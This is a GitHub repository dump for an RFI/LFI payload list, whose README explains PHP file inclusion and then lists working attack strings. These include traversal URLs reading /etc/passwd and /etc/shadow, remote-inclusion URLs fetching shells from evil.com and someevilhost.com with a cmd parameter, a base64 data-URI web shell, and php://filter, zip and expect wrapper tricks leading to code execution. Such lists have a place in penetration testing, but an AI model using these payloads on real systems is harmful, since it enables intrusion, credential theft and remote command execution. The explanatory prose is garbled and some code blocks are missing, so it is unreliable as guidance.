├── .gitignore ├── LICENSE ├── README.md └── img └── rfi-lfi.jpeg /.gitignore: -------------------------------------------------------------------------------- 1 | # Node rules: 2 | ## Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files) 3 | .grunt 4 | 5 | ## Dependency directory 6 | ## Commenting this out is preferred by some people, see 7 | ## https://docs.npmjs.com/misc/faq#should-i-check-my-node_modules-folder-into-git 8 | node_modules 9 | 10 | # Book build output 11 | _book 12 | 13 | # eBook build output 14 | *.epub 15 | *.mobi 16 | *.pdf 17 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Payload Box 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### RFI/LFI Payload List 2 | 3 |

4 | 5 |

6 | 7 |

8 | 9 |

10 | 11 | As with many exploits, remote and local file inclusions are only a problem at the end of the encoding. Of course, it takes a second person to have it. Now, this article will hopefully give you an idea of protecting your website and most importantly your code from a file iclusion exploit. I’ll give example codes in PHP format. 12 | 13 | Let’s look at some of the code that makes RFI / LFI exploits possible. 14 | 15 | ``` 16 | Files 17 | 21 | ``` 22 | 23 | Obviously this should not be used. The $ page entry is not fully cleared. $ page input is directed directly to the damn web page, which is a big “NO”. Always remove any input passing through the browser. When the user clicks on “File” to visit “files.php” when he visits the web page, something will appear like this. 24 | 25 | ``` 26 | http: //localhost/index.php? page = files.php 27 | ``` 28 | 29 | Now, if no one has cleared the input in the $ page variable, we can have it pointed to what we want. If hosted on a unix / linux server, we can display the password as configuration files for shaded or uncleaned variable input. 30 | 31 | Viewing files on the server is a “Local File Inclusion” or LFI exploit. This is no worse than an RFI exploit. 32 | 33 | ``` 34 | http: //localhost/index.php? page = .. / .. / .. / .. / .. / .. / etc / passwd 35 | ``` 36 | 37 | The code will probably return to / etc / passwd. Now let’s look at the RFI aspect of this exploit. Let’s get some of the codes we’ve taken before. 38 | 39 | ``` 40 | Files 41 | 45 | ``` 46 | Now suppose we write something like … 47 | 48 | ``` 49 | http: //localhost/index.php? page = http: //google.com/ 50 | ``` 51 | 52 | Probably where the $ page variable was originally placed on the page, we get the google.com homepage. This is where the codder 53 | can be hurt. We all know what c99 (shell) can do, and if coders are careful, they may be included in the page, allowing users to surf through sensitive files and contacts at the appropriate time. Let’s look at something simpler that can happen on a web page. The faster and more dirty use of RFI exploitation is to your advantage. Now, create a file named “test.php” and put the following code in it and save it. 54 | 55 | ``` 56 | 57 | 60 | 61 | ``` 62 | 63 | Now this file is something you can use to your advantage to include it on a page with RFI exploitation. The passthru () command in PHP is very evil, and many hosts call it “out of service for security reasons”. With this code in test.php, we can send a request to the web page, including file inclusion exploit. 64 | 65 | ``` 66 | http: //localhost/index.php? page = http: //someevilhost.com/test.php 67 | ``` 68 | 69 | When the code makes a $ _GET request, we must provide a command to pass to passthru (). We can do something like this. 70 | 71 | ``` 72 | http: //localhost/index.php? page = http: //someevilhost.com/test.php? cmd = cat / etc / passwd 73 | ``` 74 | 75 | This unix machine will also extract the file / etc / passwd using the cat command. Now we know how to exploit RFI exploit, now we need to know how to hold it and make it impossible for anyone to execute the command, and how to include remote pages on your server. First, we can disable passthru (). But anything on your site can use it again (hopefully not). But this is the only thing you can do. I suggest cleaning the inputs as I said before. Now, instead of just passing variables directly to the page, we can use a few PHP-proposed structures within functions. Initially, chop () from perl was adapted to PHP, which removes whitespaces from an array. We can use it like this. 76 | ``` 77 | Files 78 | 82 | ``` 83 | 84 | There are many functions that can clear string. htmlspecialchars () 85 | htmlentities (), stripslashes () and more. In terms of confusion, I prefer to use my own functions. We can do a function in PHP that can clear everything for you, here I’ve prepared something easy and quick about this course for you. 86 | 87 | ``` 88 | 95 | ``` 96 | 97 | Now I hope you can see what’s going on inside this function, so you can add yours. I would suggest using the str_replace () function and there are a lot of other functions to clear them. Be considerate and stop the RFI & LFI exploit frenzy! 98 | 99 | #### Basic LFI (null byte, double encoding and other tricks) : 100 | 101 | ``` 102 | http://example.com/index.php?page=etc/passwd 103 | http://example.com/index.php?page=etc/passwd%00 104 | http://example.com/index.php?page=../../etc/passwd 105 | http://example.com/index.php?page=%252e%252e%252f 106 | http://example.com/index.php?page=....//....//etc/passwd 107 | ``` 108 | 109 | Interesting files to check out : 110 | 111 | ``` 112 | /etc/issue 113 | /etc/passwd 114 | /etc/shadow 115 | /etc/group 116 | /etc/hosts 117 | /etc/motd 118 | /etc/mysql/my.cnf 119 | /proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor) 120 | /proc/self/environ 121 | /proc/version 122 | /proc/cmdline 123 | ``` 124 | 125 | #### Basic RFI (null byte, double encoding and other tricks) : 126 | 127 | ``` 128 | http://example.com/index.php?page=http://evil.com/shell.txt 129 | http://example.com/index.php?page=http://evil.com/shell.txt%00 130 | http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt 131 | ``` 132 | 133 | #### LFI / RFI Wrappers : 134 | 135 | LFI Wrapper rot13 and base64 - php://filter case insensitive. 136 | 137 | ``` 138 | http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php 139 | http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php 140 | http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php 141 | 142 | Can be chained with a compression wrapper. 143 | http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd 144 | ``` 145 | 146 | #### LFI Wrapper ZIP : 147 | 148 | ``` 149 | echo "" > payload.php; 150 | zip payload.zip payload.php; 151 | mv payload.zip shell.jpg; 152 | rm payload.php 153 | 154 | http://example.com/index.php?page=zip://shell.jpg%23payload.php 155 | ``` 156 | 157 | #### RFI Wrapper DATA with "" payload : 158 | 159 | ``` 160 | http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4= 161 | ``` 162 | 163 | #### RFI Wrapper EXPECT : 164 | 165 | ``` 166 | http://example.com/index.php?page=php:expect://id 167 | http://example.com/index.php?page=php:expect://ls 168 | ``` 169 | 170 | #### XSS via RFI/LFI with "" payload : 171 | 172 | ``` 173 | http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+ 174 | ``` 175 | 176 | #### LFI to RCE via /proc/*/fd : 177 | 178 | 1. Upload a lot of shells (for example : 100) 179 | 2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too) 180 | 181 | #### LFI to RCE via Upload : 182 | 183 | ``` 184 | http://example.com/index.php?page=path/to/uploaded/file.png 185 | ``` 186 | 187 | #### References : 188 | 189 | 👉 [Testing for Local File Inclusion](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) 190 | 191 | 👉 [Wikipedia](www.wikipedia.org/wiki/Local_File_Inclusion) 192 | 193 | 👉 [Remote File Inclusion](http://projects.webappsec.org/w/page/13246955/Remote%20File%20Inclusion) 194 | 195 | 👉 [Wikipedia: "Remote File Inclusion"](http://en.wikipedia.org/wiki/Remote_File_Inclusion) 196 | 197 | 👉 [PHP File Inclusion](https://www.owasp.org/index.php/PHP_File_Inclusion) 198 | -------------------------------------------------------------------------------- /img/rfi-lfi.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/payloadbox/rfi-lfi-payload-list/e0c530899c7e1d9ff63f7483cc2b6e077f6bffd1/img/rfi-lfi.jpeg --------------------------------------------------------------------------------